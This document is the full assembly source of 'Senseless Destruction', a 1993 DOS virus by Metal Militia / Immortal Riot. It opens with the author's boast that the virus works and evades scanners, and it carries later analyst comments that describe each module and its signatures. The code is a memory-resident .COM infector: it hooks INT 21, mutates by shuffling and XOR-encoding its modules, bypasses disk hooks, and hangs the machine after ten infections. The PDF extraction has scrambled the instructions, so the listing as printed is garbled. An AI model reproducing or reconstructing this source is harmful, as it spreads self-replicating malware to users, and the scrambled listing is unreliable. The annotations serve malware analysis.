; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;

Virus name: Senseless Destruction. Country: Sweden. Author: Metal Militia / Immortal Riot. Date: 07-22-1993.

This is a mutation of Bad-Boy by 'Unknown'. Many thanks to the coder who wrote Bad-Boy from scratch. We have tried this virus ourselves and it works just fine. It goes resident (TSR), is non-overwriting (it appends rather than destroying the host), and may halt the system. COM files grow by 1,069 bytes. The original came from Europe and was discovered in 1991. This is the second mutation of the Bad Boy virus; the first mutation was found in Bulgaria. McAfee SCAN v105 can't find it, and S&S Toolkit 6.5 doesn't find it either. I haven't tried scanners like F-PROT/TBScan, but they will probably report some virus structure. (These scanner results are the author's claims as of July 1993.) Best regards: [Metal Militia] [The Unforgiven]

; ==== Analyst notes (added on review; the text below is a PDF extraction) ====
; Senseless Destruction (1993), a mutation of "Bad-Boy": a memory-resident,
; appending .COM infector with a per-generation module shuffle and XOR layer.
; The listing lost its column layout, so the mnemonics and operands of one
; instruction often sit on different lines. Nothing below has been re-paired
; or reassembled: the code's correctness depends on exact instruction byte
; lengths (see "change code method" in module 2), so it is annotated only.
; Assembler context visible here: one segment with cs=ds=code, `.radix 16`
; (every bare number in this file is HEX), `org 100` (COM image).
code

start:

; Entry stub = the first bytes of every infected file: push tabb[02] (module 2)
; as a return address, set ds=cs, jump to `loopshit`, which jumps through
; tabb[00]. tabb[00] is false_mod_1 in the generation-0 dropper and mod_1 (the
; decoder) in infected files; either ends in `ret`, which lands in module 2.
; The resident check (module 2) and the already-infected check (module 8) both
; compare the first 0Bh bytes at offset 100 verbatim, so this stub is constant
; across generations and is usable as a signature.
segment assume cs:code,ds:code .radix 16 org 100 push word ptr cs:[tabb+2] push cs pop ds jmp loopshit

; Unshuffled data area (copied verbatim to the resident image by module 2).
; Labels are on the next line; their definitions are scattered below. Pairing
; inferred from order:
;   otto      jmp start               (not referenced elsewhere in this listing)
;   loopshit  jmp word ptr cs:[tabb]  (dispatch through the module table)
;   curofs    dw ?   running offset while modules are relocated (module 2)
;   files     db 0   infections done by this resident copy; payload at 0Ah
;   fsize     dw 2   host file size, taken from the SFT in module 8
;   ftime     dw ?   host time stamp, saved/restored by module 8
;   fdate     dw ?   host date stamp
;   stdint21  dd ?   "raw" DOS INT 21 entry, used only for the file writes
;   oldint13  dd ?   DOS's INT 13 target, swapped into the IVT during writes
;   oldint21  dd ?   saved INT 21 vector (chain target)
;   oldint24  dd ?   saved INT 24 vector (critical-error handler)
otto: loopshit: curofs files fsize ftime fdate stdint21 oldint13 oldint21 oldint24

jmp

start

jmp

word ptr cs:[tabb]

dw ? db 0 dw 2 dw ? dw ? dd ? dd ? dd ? dd ?

;number of infected files from this copy ;size of infected file

; Module table. tabb+00..0E: entry offset of modules 1..8 (slot 00 starts as
; false_mod_1 and is patched to mod_1 by it). tabb+10..1E: size of each module,
; computed from consecutive labels at assembly time (slot 10 = mod_2-mod_1 is
; the size of module 1, and so on). Module 2 rewrites the offset slots in the
; resident copy after shuffling the modules and temporarily sets bit 8000 of a
; slot as an "already placed" mark. Every module locates its own internals as
; tabb[slot] + (label - module start), which is what makes the shuffle work.
;------------- table with module parameters -------------------tabb : dw offset false_mod_1 ;00 dw offset mod_2 ;02 dw offset mod_3 ;04 dw offset mod_4 ;06 ;offset modules dw offset mod_5 ;08 dw offset mod_6 ;0a dw offset mod_7 ;0c dw offset mod_8 ;0e

dw dw dw dw dw dw dw dw

offset offset offset offset offset offset offset offset

mod_2 mod_3 mod_4 mod_5 mod_6 mod_7 mod_8 myend

-

offset offset offset offset offset offset offset offset

mod_1;10 mod_2;12 mod_3;14 mod_4;16 mod_5;18 ;size modules mod_6;1a mod_7;1c mod_8;1e

; Module 1 - coder/decoder. Walks table slots tabb+2..tabb+0E (6 iterations),
; skipping slot 0A (module 6), and XORs every byte of each module with the low
; byte of that module's own offset (al). The operation is its own inverse, so
; the same routine decodes at start-up and encodes in module 8 before writing.
; Because module 2 shuffles the module offsets per generation, both the key
; and the ciphertext change per generation. Module 6 (INT 24 handler plus the
; author strings) is never encoded and is cleartext in every infected file.
; Module 2 - install in memory (runs in the host's segment, cs=ds).
; Install check: es = PSP:[2] (top-of-memory segment); if the 0Bh bytes at
; es:100 equal cs:100 a copy is already resident and control goes to module 4.
;------------- module - 1 - coder/decoder ---------------------mod_1: mov bx,offset tabb+2 ;first module to working (module 2) mov cx,6 ;number of modules to working mod_1_lp1: cmp bx,offset tabb+0a jne mod_1_cont add bx,2 mod_1_cont: push bx push cx mov ax,[bx] ;ax - offset module mov cx,[bx+10] ;cx - size of module mov bx,ax mod_1_lp2: xor byte ptr [bx],al inc bx loop mod_1_lp2 pop cx pop bx add bx,2 loop mod_1_lp1 ret ;------------- module - 2 - mutation to memory ----------------mod_2: ;instalation check mov mov mov mov repe jne jmp

es,cs:[2] ;memory size di,100 si,100 cx,0bh cmpsb mod_2_install ;jump if not install word ptr cs:[tabb+06] ;if install, jump to module 4

; ds = cs-1 = the MCB of this PSP; only installs when it is the last block
; ('z'), otherwise the host is simply run (module 4).
mod_2_install: ;instalation mov dec mov

ax,cs ax ds,ax

cmp je

byte ptr ds:[0],'z' mod_2_cont

jmp

word ptr cs:[tabb+6]

;if no last mcb - go to mod4

; Shrinks the MCB by 0C0h paragraphs = 3072 bytes (3 KB, not the 2k the
; original comment says) and carves the resident image out of the top of that
; block: es = old top - 0C0h; ds:[12] is PSP:[2] (ds = PSP-1), i.e. the PSP's
; top-of-memory field is updated to the new ceiling. Indicator: ~3 KB missing
; from the end of conventional memory, with INT 21 pointing into it (module 3).
mod_2_cont: sub mov sub mov mov push pop mod_2_mut: mov

word ptr ds:[3],0c0 ax,es ax,0c0 es,ax word ptr ds:[12],ax cs ds

;decrement memory size with 2k

byte ptr cs:files,0

; Copies the fixed part (100..mod_1: stub, data, table) unchanged to es:100.
mov mov mov rep

di,100 cx,offset mod_1-100 si,100 movsb ;write table to new memory

; "change code method": XORs 18h into the byte after mod_1_lp2 in the RUNNING
; copy (ds=cs) before module 1 is relocated. If that byte is the ModRM of
; `xor byte ptr [bx],al` (07h), the result (1Fh) encodes `xor [bx],bl`; since
; bx == ax inside that loop the two are equivalent, so this reads as a
; per-generation decoder variant rather than a different cipher -- verify
; against the assembled bytes. Any re-layout of module 1 breaks this offset.
mov add xor

bx,word ptr cs:[tabb] bx,offset mod_1_lp2-offset mod_1+1 byte ptr [bx],18 ;change code method

; Shuffle: 8 iterations; mod_2_rnd returns a random unused table slot in bx;
; the module is copied to es:curofs, its new offset is written into the
; RESIDENT table (es:[bx]), curofs advances, and the slot in the running table
; is marked with bit 8000. Afterwards all marks are cleared (and with 7FFF)
; and control jumps to module 3 via the running copy's table (tabb+4).
mov mov mod_2_lp1: push call push mov push add mov pop pop xchg mov rep xchg mov or pop loop mov not mov mod_2_lp2: and add loop jmp mod_2_rnd: push push xor mov mod_2_lp3:

cx,8 word ptr curofs,offset mod_1 cx mod_2_rnd ;generate random module addres bx ;addres in table returned from mod_2_rnd ax,[bx] ;offset module ax bx,10 cx,[bx] ;length of module si bx di,curofs word ptr es:[bx],di ;change module offset in table movsb ;copy module to new memory di,curofs ;change current offset in new memory ax,8000 word ptr [bx],ax ;mark module - used cx mod_2_lp1 cl,8 ax bx,offset tabb word ptr [bx],ax bx,2 mod_2_lp2 word ptr cs:[tabb+4] cx es cx,cx es,cx

;unmark all modules

;go to module 3

; mod_2_rnd body: slot = (BIOS tick count at 0:046C) & 7, re-read until an
; unmarked slot is found. `and bx,7` is hand-encoded in its 4-byte imm16 form
; (presumably to pin the instruction length). Since the tick count changes only
; ~18.2 times/s, the last slots can spin for several ticks -- a noticeable delay
; on first execution (inferred). Then module 3 begins: ds=0 (IVT), the current
; INT 21 vector is saved into the RESIDENT image (es:oldint21).
mov bx,es:[46c] db 81,0e3,07,00 ;and bx,7 shl bx,1 add bx,offset tabb test [bx],8000 jnz mod_2_lp3 pop es pop cx ret ;------------- module - 3 - set interrupt vectors --------------mod_3: xor ax,ax mov ds,ax mov mov mov mov

ax,ds:[4*21] word ptr es:[oldint21],ax ax,ds:[4*21+2] word ptr es:[oldint21+2],ax

; DOS version check (AH=30): exactly AX=1E03 (DOS 3.30) selects a hard-coded
; INT 21 entry at 1460h inside the DOS data segment (INT 2F AX=1203 returns it
; in DS). stdint21 is later used only for the file writes, so this looks like
; a way to write around anything hooked on INT 21 (inferred from the split use
; of stdint21 vs oldint21). Any other DOS version just uses the live vector.
mov int cmp jne

ah,30 21 ax,1e03 mod_3_getvec

mov mov push int mov pop jmp

word ptr es:[stdint21],1460 ax,1203 ds 2f word ptr es:[stdint21+2],ds ds mod_3_setvec

; mod_3_setvec: point INT 21 at module 7 in the resident segment (offset from
; the resident table es:[tabb+0c], segment es), under cli/sti.
mod_3_getvec: mov mov mov mov mod_3_setvec: cli mov mov mov mov sti

ax,ds:[4*21] word ptr es:[stdint21],ax ax,ds:[4*21+2] word ptr es:[stdint21+2],ax

ax,word ptr es:[tabb+0c] ds:[4*21],ax ax,es ds:[4*21+2],ax

; INT 2F AH=13 (DOS "set disk interrupt handler") is called twice: the first
; call returns DOS's own saved INT 13 address in DS:DX, which is stored in
; oldint13; the second call, with the returned values still in the registers,
; restores the previous state. Modules 7/8 later exchange oldint13 with IVT
; slot 13 around the file writes, bypassing anything hooked on INT 13.
mov mov int push mov mov mov pop int

cx,es ah,13 2f ; es ; es,cx word ptr word ptr es ; 2f ;

jmp

word ptr cs:[tabb+06]

; ; es:[oldint13],dx ; get standart int13 addres es:[oldint13+2],ds ;

;go to module 4

; Module 4 - restore the host and run it. The copy loop below overwrites
; 100..myend, where module 4 itself lives, so its tail (mod_4_cont..mod_5) is
; first relocated to cs:(myend+1+fsize), i.e. just above the saved host bytes,
; and entered through push di / ret. mod_4_cont then picks the saved original
; head of the host: it sits at 100+fsize (the append position), or at myend+1
; when the host was shorter than the virus (the write at offset 0 grew the
; file, see module 8 "fp:=end of file"); copies myend-100 bytes back to 100
; and jumps to 100 via push ax / ret. ds=es=cs throughout.
;------------- module - 4 - restore old program code & start ---mod_4: push cs push cs pop ds pop es mov si,word ptr cs:[tabb+06] add si,offset mod_4_cont - offset mod_4 mov di,cs:fsize add di,offset myend+1 push di mov cx,offset mod_5 - offset mod_4_cont cld rep movsb ret mod_4_cont: mov si,cs:fsize add si,100 cmp jnc mov mod_4_cnt: mov mov rep mov push ret

si,offset myend+1 mod_4_cnt si,offset myend+1 di,100 cx,offset myend-100 movsb ax,100 ; ax ; jmp 100 ;

; Module 5 - payload. Called from module 8 once this resident copy has infected
; 0Ah (10) files. Prints the message via INT 21 AH=9 (address computed from the
; module's table slot tabb+8) and then executes cli / hlt: the CPU halts with
; interrupts disabled, so the machine hangs until reset. Nothing on disk is
; touched by this module; "destruction" here is the hang.
;------------- module - 5 - special program --------------------mod_5: mov ah,9 mov dx,word ptr [tabb+8] add dx,offset msg-offset mod_5 push cs pop ds int 21 cli hlt msg

db

; CR LF "senseless destruction..." BEL BEL '$' -- in memory this string is
; XOR-encoded in files (module 5 is slot 08, which module 1 does encode).
0dh,0a,'senseless destruction...',7,7,'$'

; Module 6 - INT 24 (critical error) handler: returns AL=3 ("fail the call")
; with iret, which suppresses the "Abort, Retry, Fail?" prompt while a
; write-protected or faulty target is being infected. The three NUL-terminated
; strings after it are not referenced by any code here. Module 1 skips table
; slot 0A, so this whole module -- including the strings -- is stored in
; cleartext in every infected file (at a shuffled position): signature material.
;------------- module - 6 - int 24 header ----------------------mod_6: mov al,3 iret db 'protecting what we are ',0 db 'joining together to take on the world.. ',0 db 'metal militia [imm0rtal ri0t] ',0

; Module 7 - resident INT 21 handler. Only AX=4B00 (EXEC load-and-execute) is
; intercepted; everything else falls through to the saved vector after the
; register pops (mod_7_exit). Note there is no extension check anywhere: any
; program handed to EXEC is a candidate, and module 8 only rejects by content
; (MZ header, size). Preserved registers: bx, si, di, es, ax.
;------------- module - 7 - int 21 header ----------------------mod_7: push bx

push push push push

si di es ax

cmp je

ax,4b00 mod_7_begin jmp mod_7_exit

; Save the current INT 24 vector (two movsw from 0:4*24 to cs:oldint24) and
; point INT 24 at module 6 (offset from the resident table tabb+0A, segment
; cs) under cli/sti. ds is restored afterwards so ds:dx is still the caller's
; file name for the open below.
mod_7_begin: push push pop xor mov mov mov movsw movsw mov cli mov mov mov sti pop

ds cs ; es ; ax,ax ; ds,ax ; si,4*24 ; di,offset oldint24 ; ; change int24 vector ; ax,word ptr cs:[tabb+0a] ; ; ds:[4*24],ax ; ax,cs ; ds:[4*24+2],ax ; ds

; Open the program read-only (AX=3D00) through the saved INT 21 (pushf/call
; simulates the interrupt), hand the handle to module 8 (tabb+0E), then close
; (AH=3E) with the flags from module 8 preserved around the close. As
; extracted, module 8 leaves CF set on every path that reached the writer
; (and therefore swapped INT 13) and clear on its early exits, so `jc mod_7_ex`
; after the close appears to mean "undo the INT 13 swap", not "error". The
; earlier `jc mod_7_ex` on open failure targets the same label, which would
; swap without a prior swap -- verify label placement against the assembled
; original before relying on this.
mov ax,3d00 ; pushf ; call cs:oldint21 ; jc mod_7_ex ; open,infect,close file mov bx,ax ; mod_7_infect: ; call word ptr cs:[tabb+0e] ; pushf mov ah,3e ; pushf ; call cs:oldint21 ; popf jc mod_7_ex

mod_7_ex:

; Exchange IVT slot 13 with cs:oldint13 (same sequence as at the end of
; module 8): puts the hooked INT 13 handler back after the write.
push cli xor mov mov xchg mov mov xchg mov sti pop

ds

; ;

; Restore the INT 24 vector from cs:oldint24 (offset, then segment).
push xor mov mov mov

ds ; ax,ax ds,ax ax,word ptr cs:oldint24 ds:[4*24],ax

ax,ax ; ds,ax ; ax,word ptr cs:[oldint13] ; ax,word ptr ds:[4*13] ; word ptr cs:[oldint13],ax ; exchange int13 vectors ax,word ptr cs:[oldint13+2] ; ax,word ptr ds:[4*13+2] ; word ptr cs:[oldint13+2],ax ; ; ds ; ; ; ;

;

mov mov pop

ax,word ptr cs:oldint24+2 ds:[4*24+2],ax ds ;

; mod_7_exit: pop the saved registers and chain to the original INT 21 with a
; far jmp, so the caller's flags come from the real DOS call. The label is
; printed after the jmp in this extraction; in the assembled code it must
; precede the pops.
pop pop pop pop pop

ax es di si bx

jmp

cs:oldint21

; restore int24 vector ;

mod_7_exit:

; Module 8 - infect the open file whose handle is in bx. Returns with CF set
; after the write path ran (see mod_8_ext) and CF clear on the early exits.
; Uses two undocumented DOS calls to reach the file's SFT entry directly:
; INT 2F AX=1220 (handle -> JFT entry, es:di) and INT 2F AX=1216 (SFT number
; in bx -> SFT entry, es:di). All file state below is then patched in the SFT
; instead of being requested through INT 21.
;------------- module - 8 - infecting (bx - file handle) -------mod_8: push cx push dx push ds push es push di push bp push mov int mov xor mov int pop

bx ax,1220 2f bl,es:[di] bh,bh ax,1216 2f bx

; Size gate: only the low word of the SFT size field (es:[di+11]) is checked
; against 0F000h (unsigned), so a file whose size is >= 64 KB is not really
; excluded if that field is a dword -- verify the SFT layout.
mov cmp jc jmp

ax,word ptr es:[di+11] ax,0f000 mod_8_c mod_8_exit

; es:[di+2] = 2 forces the SFT open mode to read/write although the handle was
; opened read-only (AX=3D00 in module 7).
mov

word ptr es:[di+2],2

; Save size, time (+0D) and date (+0F) from the SFT; the stamp is put back at
; mod_8_cont_end so the file's directory entry does not change.
mov mov

ax,es:[di+11] cs:fsize,ax

mov mov mov mov

ax,word ptr es:[di+0dh] word ptr cs:[ftime],ax ax,word ptr es:[di+0f] word ptr cs:[fdate],ax

; Read the first myend-100 bytes of the host into cs:myend+1 (ds=cs) through
; the saved INT 21; a read error exits.
push pop mov mov mov pushf call jnc jmp

cs ; ds ; dx,offset myend+1 cx,offset myend-100 ah,3f

mod_8_c:

mod_8_cnt:

cs:oldint21 mod_8_cnt mod_8_exit

;open mode - r/w ; save file size ; ; save file date/time ; ;

; ; read first bytes ;

; bp = bytes actually read (the count appended later). Files starting with
; 'MZ' or 'ZM' (EXE headers, either byte order) are left alone -- this is the
; only file-type check in the virus.
mov mov mov cmp jne jmp mod_8_nxtchk: xchg cmp jne jmp

bp,ax si,dx ax,'mz' ax,word ptr ds:[si] mod_8_nxtchk mod_8_exit

; ax - bytes read

ah,al ax,ds:[si] mod_8_cnt2 mod_8_exit

mod_8_cnt2:

mod_8_cnt1:

; Already-infected check: the first 0Bh bytes read from the file are compared
; with cs:100 (the entry stub); equal -> exit.
push push push pop mov mov mov repe pop pop jne jmp

es di cs es si,100 di,dx cx,0bh cmpsb di es mod_8_cnt1 mod_8_exit

; File position (SFT +15) := 0 without an lseek call.
mov

word ptr es:[di+15],0

; The writer (mod_8_cont..mod_8_cont_end) is copied to cs:0000 -- the unused
; PSP area of the resident image -- because it XOR-encodes the whole virus in
; place (call through tabb[00]) before the write and decodes it after; while
; encoded, module 8 itself is unreadable, so the writer cannot run from here.
push push mov add xor push pop mov cld rep pop pop

es di si,word ptr cs:[tabb+0e] si,offset mod_8_cont - offset mod_8 di,di cs es cx,offset mod_8_cont_end - offset mod_8_cont

; Push the return address (mod_8_cont_end, computed from the module's slot),
; then 0: the `ret` after the INT 13 exchange below enters the relocated
; writer at cs:0, and the writer's own `ret` comes back to mod_8_cont_end.
mov add push xor push

si,word ptr cs:[tabb+0e] si,offset mod_8_cont_end - offset mod_8 si si,si si

; Exchange IVT slot 13 with cs:oldint13 (DOS's own INT 13 target captured in
; module 3) so the writes below do not pass through any INT 13 hook.
push cli xor mov mov xchg mov mov xchg mov sti

ds

; ; ; ; check for infected file ; ; ; ; fp:=0

movsb di es

; ;

ax,ax ; ds,ax ; ax,word ptr cs:[oldint13] ; ax,word ptr ds:[4*13] ; word ptr cs:[oldint13],ax ; ax,word ptr cs:[oldint13+2] ; exchange int13 vectors ax,word ptr ds:[4*13+2] ; word ptr cs:[oldint13+2],ax ; ;

pop

ds

;

; mod_8_cont (runs relocated at cs:0): encode (call tabb[00] = module 1),
; write myend-0FF bytes from cs:100 over the start of the file via stdint21
; (the "raw" DOS entry from module 3), decode again with the same call.
ret mod_8_cont: push call pop

bx word ptr cs:[tabb] bx

mov mov mov pushf call

dx,100 ah,40 cx,offset myend-0ff ; cs:stdint21

; Off-by-one as extracted: myend-0FF bytes are written (100..myend inclusive,
; i.e. the virus plus the `db 0` at myend), but only myend-100 bytes of the
; host were saved and are restored by module 4, so the host byte at file
; offset myend-100 is replaced by that zero in every infected file. The header
; figure "grows by 1069 bytes" is consistent either way -- verify against the
; assembled original before relying on it for repair.
; On write error: discard the pushed return address, compute mod_8_ext from
; the module's slot and `ret` there (timestamp is NOT restored on this path).
pushf push call pop popf jnc pop mov add push ret mod_8_cont1: mov mov mov mov mov pushf call

bx word ptr cs:[tabb] bx

; code virus ; ; write code in begin ;

; decode virus

; mod_8_cont1: file position := current SFT size (end of file; after the
; write at offset 0 this is max(fsize, myend-0FF)), then append the bp saved
; host bytes from cs:myend+1. That is why module 4 restores from
; max(100+fsize, myend+1).
mod_8_cont1 ax ax,word ptr cs:[tabb+0e] ax,offset mod_8_ext - offset mod_8 ax ax,es:[di+11] ; fp:=end of file word ptr es:[di+15],ax ; dx,offset myend+1 cx,bp ah,40

; bp - files read ; ;

cs:stdint21

; write in end of file

; mod_8_cont_end (back in module 8): restore the file's time/date (AX=5701)
; through the saved INT 21, count the infection and, when cs:files reaches
; 0Ah, call module 5 (which halts the machine and never returns).
ret mod_8_cont_end: mov mov mov pushf call

; Exit labels as printed together by the extraction; from the code below:
; mod_8_ext = stc; jmp mod_8_ex | mod_8_exit = clc | mod_8_ex = pops; ret.
mod_8_exit: mod_8_ext: mod_8_ex:

ax,5701 cx,cs:ftime dx,cs:fdate ; cs:oldint21

; ; ; restore file date/time ;

inc cmp jne call jmp

cs:files cs:files,0a mod_8_ext word ptr cs:[tabb+8] short mod_8_ext

stc jmp

short mod_8_ex

clc pop pop

bp di

pop pop pop pop ret

es ds dx cx

; myend: one zero byte marking the end of the virus body (it is included in
; the block written at file offset 0, see module 8). The `int 20` after it is
; the "host" of the generation-0 dropper: terminate immediately. In an
; infected file the original program's head is appended at the end instead.
;--------------------------------------------------------------myend

db int

; false_mod_1: generation-0 stand-in for module 1. It patches tabb[00] to the
; real decoder (mod_1) so every copy made from this process uses it, then
; `ret`s into module 2 via the address pushed by the entry stub. The trailing
; "#" and "code ends / end start" are the segment close and program entry.
false_mod_1: mov ret code #

0 20

;code of infected file

word ptr cs:[tabb],offset mod_1

ends end start
